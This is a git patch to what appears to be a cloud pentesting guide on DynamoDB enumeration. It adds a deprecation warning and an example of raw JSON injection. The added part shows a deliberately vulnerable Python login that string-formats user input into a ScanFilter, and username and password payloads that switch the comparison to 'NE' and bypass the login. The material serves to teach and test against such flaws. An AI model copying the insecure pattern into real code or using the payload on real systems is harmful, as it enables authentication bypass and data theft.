From 6b45f8d974cac524e364cb9f175be721bcf0e4c2 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 25 May 2024 16:19:14 +0000 Subject: [PATCH] GITBOOK-612: No subject --- .../aws-services/aws-dynamodb-enum.md | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index d23d448850..76577bf571 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -123,6 +123,10 @@ If you can **change the comparison** performed or add new ones, you could retrie ### Raw Json injection +{% hint style="danger" %} +**This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +{% endhint %} + **DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. For example, injecting in a request like: @@ -139,6 +143,31 @@ an attacker could inject something like: fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. +Another **vulnerable example using a login** could be: + +```python +scan_filter = """{ + "username": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + }, + "password": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + } +} +""" % (user_data['username'], user_data['password']) + +dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) +``` + +This would be vulnerable to: + +``` +username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +``` + ### :property Injection Some SDKs allows to use a string indicating the filtering to be performed like: